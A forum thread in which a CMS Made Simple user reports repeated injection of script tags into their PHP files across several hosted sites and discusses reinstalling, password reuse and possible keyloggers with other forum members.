CMS Made Simple Forums

Over the past two weeks I have had several of my CMS MS sites hacked. Whatever it is, it's inserting a <__script__> tag at the head of my PHP files (for sure index.php, admin/login.php, and admin/index.php, possibly more that I haven't found yet).

The scripts always look like this, but with a different path every time. Googling the various paths has not helped me find a resolution yet.

For my own site (hosted on 1and1.com) I deleted my entire CMS MS install (including the old SQL database) and reinstalled the most recent version. I implemented most of the security suggestions in this sticky thread. (I do not have access/skills to make the Apache/PHP.ini modifications.)

For one of my client sites (hosted on justhost.com) I deleted my entire CMS MS install (but kept the old SQL database) and reinstalled the most recent version. I did not implement additional security measures (planned to do that today, but it was already hit overnight.)

The very next day the hack repeated itself.

I'm an HTML/CSS expert, but a SQL/PHP novice. Has anyone else seen this hack, or something like it? Any suggestions on how I can prevent it?

It's possible this isn't a CMS MS issue (it also happened to an instance of Expression Engine stored alongside CMS MS) but the only pattern I see so far is that it's happened on servers on which I have CMS MS installed (no other similarities between the sites/servers.)

We have not seen this hack before, so I myself don't think it's related to CMSMS.

Did you change passwords and database connections between the first and second hack?
Is your computer spyware (keylogger) free?
Are there any other website's on the same host who are having the same problem?

Thanks for the fast reply.

My computer possibly had keyloggers on it at one point, but it is clean now (I have recently run the latest version of Spybot S&D and Malwarebytes Anti-Malware, and run Symantec Anti-Virus at all times. I just re-ran Spybot this morning to double-check and it came up clean.)

On the client site, I reused the old database with the old password. (Whoops.)

On my own site I most definitely changed database connections/passwords, since I completely deleted the old database and created a new one with a new name, username, and password. I also definitely created this new database and new CMS MS install when my computer was keylogger free.

Something new in my life: I am running Apache and PHP on my PC and opened up port 81 to do so. However, I'm not sure how this would affect a site that I hadn't even visited in months, much less FTPed or logged in to. :/